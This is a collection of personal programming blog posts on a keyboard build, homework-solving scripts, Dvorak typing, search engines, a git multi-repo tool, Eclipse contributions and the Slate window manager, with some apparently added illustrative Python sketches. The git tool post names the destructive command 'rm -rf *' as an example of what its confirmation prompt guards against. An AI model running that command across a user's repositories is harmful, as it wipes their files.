After a while I had a look and feel complete version of my keyboard, now I just had the soldering to do, but that could wait. At this point I was halfway through the summer and I went on vacation from working during my vacation. I took my keyboard shell with me and occasionally practiced typing on the low force switches, just with the keyboard on my lap sitting by a lake with nothing connected to it.

Electronics

For the second month of the summer I worked at Shopify and every day when I got home I worked on designing the electronics and soldering up the key matrix and controller. There’s a lot more to tell about this process but this post is already 2,500 words.

Coming eventually, Part 2 “Designing and Building a Keyboard: The Mind”, in which I will detail the wiring, controller and basic firmware that bring it to the functional state it is in now.

Update 10/10/2016: Sorry I still haven’t written the other parts. The firmware is on Github though. The electronics is a key matrix connected to a Teensy 3.1 and a MCP23017 multiplexer for more outputs.

Conclusion

With everything included, including prototyping materials, extra backup parts and shipping costs the total price came to $233. This figure does not include the dozens of hours of my own labor I put in.

I posted all the CAD files on Github including the AutoCAD files for the case, the Fritzing file for the controller board and the ruby scripts that generate OpenSCAD scripts that generate mag-lev key models.

For fun, here’s the checked off items of my To-Do list including most of the building and debugging steps (after a certain point when I started the list). Don’t expect to understand it, it was written for my own reference.

- Design small one switch test layers
- Design PolyType logo plate (didn't turn out well)
- Go to Home Depot and buy 6-32 machine screws&nuts and 2'x2' MDF
- Laser cut switch test layers and logo plate in offcut acrylic
- Design circuit (to size perfboards properly)
- Test stabilizers on small acrylic test plate
- Disassemble Das Keyboard
- Finish full plate designs
- Use correct switch holes on plate design
- Modify 46 red switch springs.
- Add PCB holes to CAD file
- Cut MDF into 3 keyboard plate
- Order diodes, memory, IO expander on digikey
- Fix layout to not use stabilized velo keys
- Laser cut new plate for test cake
- Laser cut finished plate design in MDF
- Test sizing of PCB in MDF
- Mount cherry switches in MDF plate and put das caps on them
- Test feel of entire layout, is last chance to change it.
- USB slot on clear top layer
- turn long thumb key slots sideways
- make display screw holes bigger
- move ring finger column down
- shorter USB slot
- Laser cut finished plate in Acrylic
- Test fit of all plates together
- Test fit of components in pockets
- Mount all switches
- Wire up key matrix rows
- Install stabilizers
- Buy female headers and PCB screws
- Wire up matrix columns
- Solder controller board
- Wire matrix to controller board

Stay tuned for further parts of this saga!

A Tour of the Ruby Standard Library

2014-06-25T00:00:00+00:00

Recently I gave a full length talk at Ottawa Ruby on highlights of the Ruby standard library. It has elements suited to both beginner and advanced Rubyists.

The Ruby standard library is huge and awesome and this talk was designed to show off some of the cool parts of it that are helpful in everyday Ruby programming, and some that are mostly just useful for trivia.

I gave the talk on June 24, 2014.

Hacking Math Homework

2013-12-09T00:00:00+00:00

Many high school students complain about boring and repetitive homework, but I’ve found a fun way of dealing with this that I find actually helps me understand concepts even better. When faced with large rote assignments I write programs to complete the homework like no human can: instantly, perfectly and on a large scale. In the past I have written Literary Analysis Visualizations, Punnett Square generators and Graphing Programs.

Most of the time it takes way more time to write the program than it would take to do the homework but I end up learning a lot more and having more fun. Recently I wrote my most outrageous program yet: it took 10 times longer than it should have and blew away my teacher and class.

Part of my Advanced Functions class summative this year was to create a series of piecewise functions that when graphed produce a picture. Some examples given were line drawings of a smiley face and the Batman symbol. But I had an idea that would go beyond the intended simple line drawings so I spent my weekend implementing it.

I wrote a program that takes an image and composes equations of varying densities into hundreds of massive piecewise functions so that when you graph them on a very large canvas and zoom out they replicate the image in greyscale. The output looks like this:

Additional Resources

Another part of the program outputs a massive LaTeX document containing all the large piecewise functions, which produces a huge PDF. You can download a PDF that explains all the parts and has some more examples.

The Program

The program is written in Python and uses matplotlib, Numpy and Pillow. Excuse the terrible code with the manual constants, global variables and terrible logic structure. Not only was I learning Python while writing this but I had to finish the program by the next day and then never use the program again.
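The original code isn't reproduced here, so the following is only a minimal sketch of one way the idea could work, not the program described above. It assumes each pixel becomes one piece of a piecewise function: a sine wave whose frequency grows with the pixel's darkness, so darker areas get denser ink when graphed. The names `MAX_CYCLES`, `pixel_to_piece`, `row_to_piecewise`, `evaluate` and `to_latex` are all made up for illustration, and it uses plain lists instead of Pillow or NumPy to stay self-contained.

```python
import math

MAX_CYCLES = 8  # assumed: oscillations per pixel for a fully black pixel


def pixel_to_piece(x, row, brightness):
    """Describe one pixel as (x_start, x_end, cycles, baseline).

    brightness runs from 0 (black) to 255 (white); darker means more cycles.
    """
    darkness = 1.0 - brightness / 255.0
    cycles = round(darkness * MAX_CYCLES)
    return (x, x + 1, cycles, row + 0.5)


def row_to_piecewise(row_index, brightness_row):
    """Turn one row of pixels into the pieces of a single piecewise function."""
    return [pixel_to_piece(x, row_index, b) for x, b in enumerate(brightness_row)]


def evaluate(pieces, x):
    """Evaluate the piecewise function at x by finding the piece that covers it."""
    for x_start, x_end, cycles, baseline in pieces:
        if x_start <= x < x_end:
            return baseline + 0.4 * math.sin(2 * math.pi * cycles * (x - x_start))
    raise ValueError("x is outside the function's domain")


def to_latex(pieces):
    """Render the pieces as a LaTeX cases environment."""
    rows = [
        r"%.1f + 0.4\sin(2\pi \cdot %d (x - %d)) & %d \le x < %d \\"
        % (baseline, cycles, x_start, x_start, x_end)
        for x_start, x_end, cycles, baseline in pieces
    ]
    return "\\begin{cases}\n" + "\n".join(rows) + "\n\\end{cases}"


# One row with a white, a black and a mid-grey pixel.
pieces = row_to_piecewise(0, [255, 0, 128])
print(to_latex(pieces))
```

Sampling `evaluate` densely across every row and plotting the points would give the zoomed-out greyscale effect, under the assumptions above.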

Typing Faster

2013-09-30T00:00:00+00:00


Learning to Type Efficiently in 3 Weeks

Are you satisfied with your current typing speed? Do you even know what speed you type at? If you don’t know go test yourself on KeyHero, I’ll wait. Typing faster and in the correct way has many advantages including productivity gains, ergonomics and ability to look at the screen while typing. However, not everyone can simply practice typing and improve their speed, sometimes more drastic action is required. With the right method you can improve your speed from 25 wpm to 60 wpm in 3 weeks of casual effort like I did. Two years later I now type properly at 80 wpm with no dedicated practice since those 3 weeks.
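To put rough numbers on the productivity gain, here is a small back-of-the-envelope sketch. The 25 and 60 wpm figures come from the paragraph above; the minutes typed per day and work days per year are assumptions chosen purely for illustration, and `typing_savings` is a made-up helper name.

```python
def typing_savings(old_wpm, new_wpm, minutes_per_day, work_days_per_year, years=1):
    """Estimate hours saved by typing the same number of words at a faster speed."""
    total_minutes = minutes_per_day * work_days_per_year * years
    words_typed = old_wpm * total_minutes      # words produced at the old speed
    minutes_at_new_speed = words_typed / new_wpm
    return {
        "speedup": new_wpm / old_wpm,
        "hours_saved": (total_minutes - minutes_at_new_speed) / 60,
    }


# Assumed workload: 60 minutes of typing per work day, 250 work days per year.
result = typing_savings(old_wpm=25, new_wpm=60, minutes_per_day=60, work_days_per_year=250)
print("%.1fx faster, about %.0f hours saved per year" % (result["speedup"], result["hours_saved"]))
```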

Most people improve their typing speed through practice on sites like KeyHero. This approach works in some cases but there are some cases where this approach is ineffective. In order for your practice to be effective you have to continue typing faster and correctly afterwards during normal computer use. For many years I typed at a dismal speed of 25 wpm with incorrect fingering and my eyes firmly focused on my keyboard. I tried to practice typing correctly and would get up to 20 wpm without looking at the keyboard but as soon as I was done and I wanted to program or chat with friends I would go back to my slightly faster but incorrect method of typing and lose my progress. No matter how hard you practice if you immediately go back to looking at your keyboard or typing improperly afterwards you won’t get any faster.

Salvation came a couple years ago when I discovered a method of kicking out my typing crutches: learning Dvorak. Dvorak is a keyboard layout with a much more efficient design with the most common letters on the home row. It is supposedly more efficient but I couldn’t care less about that, what mattered to me is that all the keys were in different positions and the labels on the keys were wrong. I basically threw away everything I knew about typing and started afresh typing properly and efficiently, at 0 wpm. After a weekend of studying I had learned the layout. In only a week I beat my previous speed. In 2 weeks I doubled it and in 3 weeks I was typing at 60 wpm. Interestingly, I was only practicing about one hour per day. The important thing was that I never switched my computer off of Dvorak and did everything in the new layout.

By starting from the beginning on a keyboard layout where you can’t cheat and look at keys, you can eliminate the bad habits that prevent you from becoming a fast typist. If you look at your keyboard while you type you miss helpful auto-complete popups and typos you have made, leading to drastically lower effective wpm. Not only this but if you truly need to look you are limiting your typing speed to how fast you can target the next letter.

Unlike Colemak, the Dvorak layout is available by default on most versions of OSX, Windows and Linux so even if you have to use someone else’s computer you can switch the layout. You don’t have to buy a special keyboard and you might even get ergonomic benefits from using a more efficient layout and not having to contort your fingers so much. After a few years of using Dvorak I haven’t had any problems with using other people’s computers or keyboards. You can always fall back on hunt and peck if you can’t be bothered to change the layout setting.

If your typing speed is below 40 wpm or you have to look at the keyboard I highly recommend you learn Dvorak to get rid of your bad habits and improve your speed. This trick helped me immensely and if you have trouble typing quickly because of bad habits, it can help you too.

Specifics

To initially learn the basic layout so that I could type every letter, albeit slowly, I used two methods. I practiced with lessons on dvorak.nl and printed off a sheet with the layout so that I could memorize it away from the computer. I did this all in 2 days of focus so that I wouldn’t have to switch back to QWERTY between practices to get things done.

Once I could type everything I needed to I started using KeyHero, which is a nicer platform for both practicing and tracking your progress. I also used Dvorak for everyday things like programming and writing. I was slow to begin with but very soon I could type faster than before.

The Best Search Engine For Programmers

2013-05-17T00:00:00+00:00

There are many different comparisons of search engine results out there but I thought I would do one specifically geared towards the audience I identify with: programmers.

Do note that these tests are not rigorous and are based on my observations of which search engine delivers the best results from a programmer’s perspective for a number of programming related searches.

The tests were conducted using Google Chrome in Incognito mode while signed out of any accounts I had with the site in question.

I will be comparing the following search engines:

Google
Bing
DuckDuckGo: This will be particularly interesting since DDG has a number of features geared towards geeks and programmers.
Samuru: A cool new search engine based on natural language processing.

1. Slate

Slate is a window management tool for OSX which I have written about before. The correct first result should probably be Slate magazine but the geeky result I am looking for is the window manager. Since Slate is not as popular as my other search terms I threw this one in as a tough start to the comparison.

Results

Google actually got it as the second result! I was so stunned by this that I thought Google was tracking me even with incognito. But I got one of my non-geeky friends to Google it and he got it as a result as well.

All the other search engines returned the magazine first and then the rock.

Winner

Google by a long shot! I only tried this one because I thought none of them would get it.

2. Chef

If a programmer searches for “Chef” they are probably referring to the automation platform by Opscode. What I am looking for is results that talk about Chef, preferably from Opscode.

Results

All search engines had Opscode Chef on the first page but only some had it in the top 3.

Winner

Google was the only search engine that returned Chef in the top 3 results and it put it as the first result.

3. Node

This is an interesting one since even as a programmer it is tough to figure out if the correct result is a networking node or Node.js.

Results

Winner

Depends on your personal preferences. Google and Samuru put nodejs.org first and Bing and DDG put networking nodes first. Bing is the only one that does not mention both.

4. Underscore

Should refer to underscore.js. No screenshots for this one because I have already made you scroll too much.

Google: 2/3 including top result are underscore.js
DuckDuckGo: 1/3
Bing: 0/3
Samuru: Samuru gave underscore.js as third result on first search but because of the way the engine works it gave 3 articles about the character 30s later after it had done more processing.

5. Ruby

Interestingly, every search engine got the Ruby language as the top result except for Bing, which gave the gem as the top result.

Overall Winner

Google is the only search engine that returned the results that a programmer would be looking for every time. It seems the worst of the 4 search engines was Bing, which got many things wrong, even something as simple as Ruby.

Too Many Projects, Not Enough pro

2013-05-01T00:00:00+00:00

I have too many projects, so I started a new project to solve my problems. This project is a little tool called pro which allows you to easily deal with all your git repositories.

It has a handful of very useful features, each of which solves a problem that I have experienced. I imagine they will be useful to others as well. You can get pro by running gem install pro.

Do note that a Unix system is required to use this, so it won’t work on Windows without Cygwin.

CD’ing to a project’s repository

Cd’ing to your projects is harder than it should be. There are many tools that try and solve this problem using frequency and recency. Pro solves the problem by fuzzy searching only git repositories.

The pd command allows you to instantly CD to any git repo by fuzzy matching its name. You can install the pd tool (name configurable) by running pro install. Once you have it you can do some pretty intense cd’ing:

State of the Repos Address

Oftentimes I find myself wondering which git repositories of mine still have uncommitted changes or unpushed commits. I could find them all and run git status but it would be nice to get a quick overview. pro status does this.

You can also run pro status <repo> to show the output of git status for a certain repo.
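As a rough illustration of how such an overview could be computed (this is not pro's actual implementation, which is written in Ruby), the sketch below parses the output of `git status --porcelain --branch`. The helper names `git_status` and `summarize_status` are made up, and counting untracked files as uncommitted changes is an assumption.

```python
import re
import subprocess


def git_status(repo_path):
    """Run git in repo_path and return its machine-readable status output."""
    result = subprocess.run(
        ["git", "status", "--porcelain", "--branch"],
        cwd=repo_path, capture_output=True, text=True, check=True,
    )
    return result.stdout


def summarize_status(porcelain_output):
    """Report whether a repo has uncommitted changes and how many unpushed commits."""
    lines = porcelain_output.splitlines()
    # With --branch the first line looks like "## main...origin/main [ahead 2]".
    header = lines[0] if lines and lines[0].startswith("## ") else ""
    changes = [line for line in lines if line and not line.startswith("## ")]
    ahead = re.search(r"ahead (\d+)", header)
    return {
        "uncommitted": len(changes) > 0,
        "unpushed": int(ahead.group(1)) if ahead else 0,
    }


sample = "## main...origin/main [ahead 2]\n M README.md\n?? notes.txt\n"
print(summarize_status(sample))
```

Calling `summarize_status(git_status(path))` for every discovered repository and printing only the ones with something to report would give a similar quick overview.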

Run all the commands!

Wouldn’t it be cool if you could run a command on all your repos and see a summary of the output? Now you can!

You can do this with pro run <command>. If you don’t pass a command it will prompt you for one.

For example, searching all your repos for ruby files:

Notice that it double checks before running so you don’t accidentally run rm -rf * on all your projects.

The Pro Base

Pro can use a base directory to speed up its search for git repos. By default it uses your home folder.

To set the base directory either create a file at ~/.proBase containing the base path or set the environment variable PRO_BASE to the path.
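The pieces described so far (picking a base directory, finding git repos under it and fuzzy matching their names) can be sketched roughly as follows. This is a Python illustration, not pro's real code: the function names are made up, letting `PRO_BASE` take precedence over `~/.proBase` is an assumption, and the fuzzy match is a simple in-order subsequence test that may differ from what pro uses.

```python
import os


def resolve_base(env=os.environ, home=None):
    """Pick the base directory: PRO_BASE, then ~/.proBase, then the home folder."""
    home = home or os.path.expanduser("~")
    if env.get("PRO_BASE"):  # assumed to win over the file
        return env["PRO_BASE"]
    base_file = os.path.join(home, ".proBase")
    if os.path.isfile(base_file):
        with open(base_file) as f:
            path = f.read().strip()
        if path:
            return os.path.expanduser(path)
    return home


def find_git_repos(base):
    """Return every directory under base that contains a .git directory."""
    repos = []
    for dirpath, dirnames, _filenames in os.walk(base):
        if ".git" in dirnames:
            repos.append(dirpath)
            dirnames[:] = []  # don't descend into a repo we already found
    return repos


def fuzzy_match(query, name):
    """True if the characters of query appear in name in order (case-insensitive)."""
    remaining = iter(name.lower())
    return all(ch in remaining for ch in query.lower())


def find_repo(query, base):
    """Return paths of repos whose folder name fuzzy-matches query."""
    return [r for r in find_git_repos(base) if fuzzy_match(query, os.path.basename(r))]
```

A smaller base directory means `os.walk` has less to traverse, which is why setting one speeds up the search.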

Conclusion

pro is a handy tool that makes working with lots of git repos much easier. If you want to get it run gem install pro. You can also check it out on Github.

The Best Programming Game

2013-04-10T00:00:00+00:00

Ever since I was in grade 4 I have been playing the world’s best programming game. The game is highly rewarding, an excellent way to learn programming and it’s even free!

This game has many advantages over other programming video games:

Like Minecraft, it is open-ended and allows players to set their own goals.
It allows players to use any library and programming language they want to.
The game can lead to real world rewards and recognition. It has MLG players and top gamers can earn hundreds of thousands of dollars per year.
It can run on any computer regardless of how recently it was made or what OS it runs.
It even has multiplayer support! You can play with friends and even post your solutions to the puzzles online.

Have you guessed what game it is yet? Does it sound interesting?

The game is called “Just Friggin Program” and it works like this:

Think of a program you would like to write.
Use the internet to learn things.
Write the program!
You beat the level! Repeat for the next level.

I am now 17 and I have gotten a lot of fun out of playing this game for the last 8 years. I have learned everything I know about programming through playing and I’m sure many other programmers have too. The best part is I have ended up with a portfolio of cool projects while players of other games just have their “levels completed” screen to show for it.

Instead of introducing children to brand new 3D “learn-to-program” games I suggest the oldest game of them all as the best way to teach kids programming.

Contributing to Eclipse

2013-03-29T00:00:00+00:00

Background

When most programmers think of Eclipse they think of the Java IDE but Eclipse is actually a huge group of projects with very little relation to each other except that they are all managed by The Eclipse Foundation.

I had the privilege of working for The Eclipse Foundation this past semester at school as a High School co-op job. The Foundation does not actually employ developers but since I was working for free I was able to actually work on the code base with expert guidance from my supervisor Wayne Beaton at the Foundation.

This was an interesting experience. I worked on fixing bugs in various Eclipse projects including one that had been around for 11 years and likely affected thousands of developers. In this article I hope to share some of the knowledge I gathered about contributing to Eclipse projects.

Edit: To clarify, I am not ranting about how bad my job was. I thoroughly enjoyed my time at The Eclipse Foundation. I also enjoy using Eclipse as an IDE. Yes it is slow and RAM-intensive but its amazing autocomplete and content assist make it invaluable for Java programming. I use VIM for every other language.

One Does Not Simply Compile Eclipse

For my first week my supervisor had the idea of using me to figure out how difficult it is to be a new contributor to Eclipse. I was given a bug to fix and no other instruction.

I started off with the assumption that I would have to compile Eclipse, which seemed reasonable enough given my experience with other open source projects.

Unfortunately, I was dead wrong. I spent many hours reading through outdated wiki pages and filling up my hard drive with build files until my supervisor eventually told me what I had only seen briefly mentioned in a paragraph full of adjectives: you do not need to compile Eclipse to develop it.

The One True Path

Eclipse is actually developed within Eclipse using a plugin called the Plug-in Development Environment (PDE). This sounds like it is only useful for developing plugins, and it is.

The thing is Eclipse is actually almost entirely made up of Eclipse plugins. This is an excellent architecture once you start developing for it but it is not necessarily easy for new contributors.

Working on an Eclipse Project

Before following this procedure make sure you have the PDE plugin and the EGit plugin installed.

This procedure only applies to plugins that are plugins to the Eclipse IDE.

Clone the right repository in EGit.
- You can find all the repositories at http://git.eclipse.org/c/
- You only need the repository you will be working on directly, it will use the binary plugins in your Eclipse installation for dependencies.
- Make sure to select the import projects box in the clone dialog.
Create a new ‘Eclipse Application’ run configuration.
Make changes to the code and run or debug your configuration.

This will launch another copy of Eclipse with the changes that you have made. You can even set breakpoints and run it in the debugger.

Bugzilla

All Eclipse bugs are tracked on http://bugs.eclipse.org/. They use the loose definition of the term ‘bug’ that includes feature requests and things that should be made better.

Any code contribution you make as a non-committer (which you probably are if you are reading this article) must be made through Bugzilla. If you write a new feature and want to contribute it you should create a new bug saying the feature should be added and immediately submit a patch file.

You can either submit a patch by attaching a patch file to the bug or on some projects by submitting a pull request with the bug id in the title to the Github mirror of the project. Keep in mind that not all projects have active committers on Github to see your pull request so you may want to link to it from the bug.

Next Steps

With any luck a committer will see your patch and write a comment about it. This could take anywhere from a day to many months depending on how active the project is.

On some of my patches I got a helpful response within hours, on others I only got a reply weeks later and some of my patches are still sitting there to this day…

The committer may recommend some changes to your patch to fix bugs or make it better. Once your patch is good enough the developer will commit it. They may ask you some questions about originality or have you fill out a form as part of the intellectual property process. I think my supervisor said they should have had me fill out a form but they never did.

Congratulations! You may now enjoy the warm fuzzy feeling that comes from contributing to an Eclipse project!

My Own Journey

I submitted patches for many bugs during my time at The Foundation. I fixed many small bugs like having the Javadoc for a function show up in the Javadoc view when you select it with autoComplete.

Some of my larger achievements:

Helping fix bugs related to Retina displays so that Eclipse displays crisply on new Retina MacBook Pros.
Updating the Eclipse Ruby DLTK project to support debugging ruby 1.9+ using the ‘debugger’ gem instead of the outdated ‘ruby-debug’ gem on 1.8.

My biggest achievement was fixing an 11 year old bug that affects any Eclipse user who has ever had to forcefully stop Eclipse and then lost their place in what they were working on. Bug 2369.

Eclipse is very good at auto-saving state when it is shut down properly but many users like myself keep Eclipse open constantly and only ever start it up again when it crashes or our computer crashes.

The reason nobody experienced had taken it on was probably because it was very difficult. I toiled for weeks chasing through layer upon layer of abstraction trying to untie the workbench save code from the shutdown code.

I eventually settled upon copying the entire workbench model and then cleaning up the parts that were not supposed to be persisted in the copy. I gradually found what parts had to be removed from the model by chasing the causes of various duplicate menu items and toolbars.
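The general shape of that copy-then-clean approach can be illustrated with a toy model. This is only a conceptual sketch in Python, not the Eclipse fix itself (which works on the real workbench model in Java); the nested-dict model and the `transient` flag are hypothetical stand-ins for "parts that were not supposed to be persisted".

```python
import copy


def snapshot_for_save(model):
    """Deep-copy the live model, then strip non-persistent parts from the copy only."""
    clone = copy.deepcopy(model)
    _prune(clone)
    return clone


def _prune(node):
    """Recursively drop children flagged as transient (hypothetical flag)."""
    node["children"] = [c for c in node.get("children", []) if not c.get("transient")]
    for child in node["children"]:
        _prune(child)


live_model = {
    "id": "window",
    "children": [
        {"id": "editor-area", "children": []},
        {"id": "generated-menu", "transient": True, "children": []},
    ],
}
saved = snapshot_for_save(live_model)
print([c["id"] for c in saved["children"]])
```

Because the cleanup runs on the copy, the running workbench is untouched and the save no longer needs to be tied to shutdown.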

I managed to fix the bug just one week before my co-op term ended, and I got to feel that warm fuzzy open source contribution feeling knowing that I made a difference people would notice. And they did:

@mmmandel wow, a 4 digit bug number. You can almost see the evolution of the platform UI team by reading through the comments.
— Ian Bull (@irbull) March 14, 2013

Ottawa Ruby Lightning Talks

2013-02-06T00:00:00+00:00

I have attended the Ottawa Group of Ruby Enthusiasts (http://ottawaruby.ca/) for about a year now. It has been a great place to meet other Ruby developers and learn interesting things.

The group normally has a main speaker who gives a long talk and one or two 10 minute lightning talks punctuated by breaks to eat pizza and talk. The main talk is normally over Skype and the lightning talks are done by volunteers from the group.

I have given two lightning talks on topics which I believed I might know more than other members. Both talks went well and I’ve decided to post the slides. Be aware that I did do a significant amount of talking so you can’t get the whole message from just the slides, but they are better than nothing.

Edit: The Ruby Standard Library

I recently did a full length talk on the Ruby standard library. You can find the slides at http://thume.ca/rubytour.

Ruby + Programming Contests

The first talk I did was on writing programming contests in Ruby. I write lots of programming contests and have tried using a couple different languages for them but keep coming back to Ruby.

Ruby > Shell Scripts

My most recent talk, which I gave last meeting, was on using Ruby as a scripting language to automate repetitive tasks.

Developing a Gem in 20 Minutes

I live coded a simple Ruby gem using Bundler in 20 minutes and explained some tricks and how easy it was to write Ruby Gems.

Here’s a Transcript

Improv Lightning Talk

I recently gave an improvised lightning talk prompted by the lack of other lightning talks called “How to do a lightning talk.” I talked about choosing a topic that you feel you have unique knowledge of to give you more confidence and how all that was really important was the confidence to go up there. Everything else would work itself out.

Hacking English Class

2013-01-24T00:00:00+00:00

I was sitting in English class last year and thinking about how English was about as far away from programming as you can get. We were discussing the significance of characters in the novel Lord of the Flies and I thought “I wonder if I could write a program to analyze this book, that would be ironic.”

So that evening I wrote a Ruby script that analyzed the occurrences of characters’ names in Lord of the Flies and graphed them over time. It was a fun graph, especially its most noticeable feature: references to “Piggy” suddenly dropping.
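The original script was in Ruby and isn't shown, so here is a minimal Python sketch of the same kind of analysis: split the book into equal chunks and count how often each name appears in each chunk. The function name `name_counts_over_time` and the choice of ten chunks are assumptions for illustration.

```python
import re


def name_counts_over_time(text, names, chunks=10):
    """Count occurrences of each name in successive equal-sized slices of the text."""
    words = re.findall(r"[A-Za-z]+", text)
    # Ceiling division so every word falls into one of the chunks.
    size = max(1, -(-len(words) // chunks))
    series = {name: [0] * chunks for name in names}
    for i, word in enumerate(words):
        if word in series:
            series[word][min(i // size, chunks - 1)] += 1
    return series


sample = "Ralph Piggy Piggy Ralph Jack Ralph"
print(name_counts_over_time(sample, ["Ralph", "Piggy"], chunks=2))
```

Plotting each list as a line, with chunk index on the x-axis, gives a graph of how much each character is mentioned as the story progresses.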

I went on to write another script to analyze Lord of the Flies as well as other scripts during English class this year. Here are some of the ones I have come up with, starting with the most recent.

Most recently I wrote a program that reads entire stories and generates passages that capture the texture of the story using Markov Trees.
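For a feel of how this kind of generator works, here is a minimal word-level Markov chain sketch in Python. It is a generic textbook version and may differ from the structure the original program used; `build_chain`, `generate` and the default `order` of 2 are illustrative choices.

```python
import random
from collections import defaultdict


def build_chain(text, order=2):
    """Map each run of `order` consecutive words to the words that follow it."""
    words = text.split()
    chain = defaultdict(list)
    for i in range(len(words) - order):
        chain[tuple(words[i:i + order])].append(words[i + order])
    return chain


def generate(chain, length=30, seed=None):
    """Walk the chain from a random starting state to produce a passage."""
    rng = random.Random(seed)
    state = rng.choice(list(chain))
    output = list(state)
    while len(output) < length:
        followers = chain.get(state)
        if not followers:  # dead end: this state only appeared at the end of the text
            break
        output.append(rng.choice(followers))
        state = tuple(output[-len(state):])
    return " ".join(output)


story = "the boy saw the sea and the boy saw the fire and the fire saw the boy"
print(generate(build_chain(story), length=12, seed=1))
```

Because every step only uses word sequences that actually occur in the source, the output keeps the local texture of the story while wandering away from its plot.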

In grade 11 my project was analyzing the most common colours in The Great Gatsby. My teacher thought that yellow would be the most common but it turns out to be white.

My other work this year was highlighting important words in the poem Beowulf.

As well as my two Lord of the Flies graphs.

The second one shows words that appear close together, the saturation indicates how often they occur close together.
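A co-occurrence graph like this can be sketched as follows. This is an assumed reconstruction rather than the original script: "close together" is taken to mean within a fixed number of words, and saturation is taken to be each pair's count divided by the largest count. The names `cooccurrences` and `saturation` are made up.

```python
from collections import Counter


def cooccurrences(words, targets, window=5):
    """Count how often two different target words appear within `window` words."""
    targets = set(targets)
    positions = [(i, w) for i, w in enumerate(words) if w in targets]
    counts = Counter()
    for a, (i, first) in enumerate(positions):
        for j, second in positions[a + 1:]:
            if j - i > window:
                break  # positions are sorted, so later ones are even further away
            if first != second:
                counts[tuple(sorted((first, second)))] += 1
    return counts


def saturation(counts):
    """Scale counts to 0..1 so the most frequent pair is fully saturated."""
    top = max(counts.values(), default=1)
    return {pair: n / top for pair, n in counts.items()}


words = "Ralph and Piggy saw Jack then Ralph hit Piggy".split()
pairs = cooccurrences(words, ["Ralph", "Piggy", "Jack"], window=2)
print(saturation(pairs))
```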

Using Slate: A Hacker's Window Manager for Macs

2012-11-19T00:00:00+00:00

Edit: I’ve recently switched to using Mjolnir and have posted a new tutorial on that.

Switching windows with the keyboard on Mac OSX is hilariously inefficient: it involves repeatedly pressing command+tab through millions of programs until you get to the right one when you could have just clicked the window and been done with it. Moving windows is no better so people have resorted to paying for tools like SizeUp and Divvy. I used to have these problems too until I ~~switched to Linux~~ discovered a program called Slate.

Fancy window management is no longer just for Linux users and their XMonad.

Enter Slate

Slate is a keyboard-driven window management program for Mac OSX. It is highly configurable and has tons of features. It has permanently changed the way I use my Mac. Not only is it better than other popular programs like Divvy, SizeUp and Moom, it beats their prices at being free. Slate is the VIM/Emacs of window managers: it is less of a window manager than a workflow changing tool you will never give up.

Slate has so much functionality that I think of it more as a shortcut-based productivity tool than a window manager. Here is a sample of what it can do:

Move/Resize/Shift windows: this can be done based on different screen size fractions and even mathematical formulae. There are commands for practically every window operation you can think of. It also supports the Divvy style sizing grid.
Switch Windows: Slate can act as a complete replacement for command+tab in many ways. I will talk about this more in the “Window Switching” section.
Manage multiple monitors: Slate can move windows between monitors as well as detecting your monitor configuration and automatically moving windows around when you plug in an external monitor.
Save window layouts: Slate has a feature called “snapshots” that allows you to save your current window layout and restore it at any time. This is handy for having different layouts for different projects/tasks.

In this article I will describe the kind of things you can do with Slate and how to configure it to do these things.

Switching Windows

Slate allows me to switch to any window I want in one shortcut and a single key press. I can do this using a feature called “Window Hints”. If you have ever used easyMotion for Vim or Vimperator/Vimium you will be familiar with this concept.

When you press a shortcut (I use cmd+e), every window is instantly overlaid with a letter, starting with those on the home row of your keyboard. By pressing the letter over a window your focus is transferred to that window. For windows that are hidden behind others the application icon is displayed in the overlay.

As usual, a picture is worth a thousand words:

Notes: There is an option to overlay the icons with a dark background so that it is easier to read the letters. Also note the fancy Slate managed window layout.

Switching Windows Even Faster

Even though window hints are super fast there are some applications I switch to and from so often that I wanted to be able to do it in one shortcut. Luckily, Slate had my back. Using Slate’s focus command I was able to give my most commonly used programs their own switching shortcuts.

Inspired by this article, I use a program called “PCKeyboard Hack” (ironically mac only) to bind my caps lock key to command+option+shift+control which I call “hyper”. I use this binding to manage all my custom shortcuts. For example, hyper+e focuses on my browser, hyper+u focuses on my editor, hyper+i focuses on iTerm, hyper+m focuses Mail, etc…

Moving Windows

Slate has numerous commands for moving and resizing windows. I personally only use a small portion of them. The most common ones are the classic “resize to left half”, “resize to right half” and “fill the screen”; however, I also have ones like “move this to my other monitor” and “layout my applications across both monitors just the way I like them”. All of these are bound to keyboard shortcuts.

I started off with Slate by rebinding my numpad to window movement commands. Whenever I need to type a number I use the ones along the top of the keyboard so before Slate the numpad was just useless buttons. I bound the numpad keys to resize windows in the direction they pointed. For example, 5 was fullscreen, 4 was left half and 6 was right half. The other buttons were quarters, top and bottom. Special numpad keys like * and + did things like display a window resizing grid or arrange my windows in a certain layout.
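The geometry behind that numpad scheme can be sketched in a few lines of Python. This is an illustration of the arithmetic only, not Slate configuration: the exact corner assignments (7 as top-left and so on) are inferred from the physical numpad layout, a top-left screen origin is assumed, and `NUMPAD_REGIONS` and `window_frame` are made-up names.

```python
# Each entry is (x, y, width, height) as fractions of the screen.
NUMPAD_REGIONS = {
    "7": (0.0, 0.0, 0.5, 0.5), "8": (0.0, 0.0, 1.0, 0.5), "9": (0.5, 0.0, 0.5, 0.5),
    "4": (0.0, 0.0, 0.5, 1.0), "5": (0.0, 0.0, 1.0, 1.0), "6": (0.5, 0.0, 0.5, 1.0),
    "1": (0.0, 0.5, 0.5, 0.5), "2": (0.0, 0.5, 1.0, 0.5), "3": (0.5, 0.5, 0.5, 0.5),
}


def window_frame(key, screen):
    """Convert a numpad key into a pixel frame on screen = (origin_x, origin_y, width, height)."""
    fx, fy, fw, fh = NUMPAD_REGIONS[key]
    origin_x, origin_y, width, height = screen
    return (origin_x + fx * width, origin_y + fy * height, fw * width, fh * height)


print(window_frame("6", (0, 0, 1440, 900)))  # right half of a 1440x900 screen
```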

I soon grew tired of reaching for my numpad so I added bindings to the home row of my keyboard using the hyper key. This is more convenient for when I don’t have a numpad and it makes it so I don’t have to reach over.

I have just scratched the surface of what Slate can do in terms of window movement and resizing. Slate has commands for resizing windows incrementally, nudging windows around, resizing to any fraction of the screen you want and even moving windows to specific pixel positions.

Configuring Slate

A.K.A How do I do all this cool stuff?

Like many amazing tools such as VIM and ZSH, Slate is configured through a dotfile in the home directory called .slate. The Slate Readme file has very detailed information on configuring Slate so I am just going to show some tricks that let you do specific things.

The ~/.slate file is made up of different commands. The top level commands are:

config: for global configurations.
alias: to create alias variables.
layout: to configure layouts.
default: to default certain screen configurations to layouts.
bind: binds a key to an action.
source: to load configs from another file.

The # character is used for comment lines and ' is used to delimit strings.

General Configuration

Using the config command, you can set a variety of options that change how Slate works. Here are some options that I like to set:

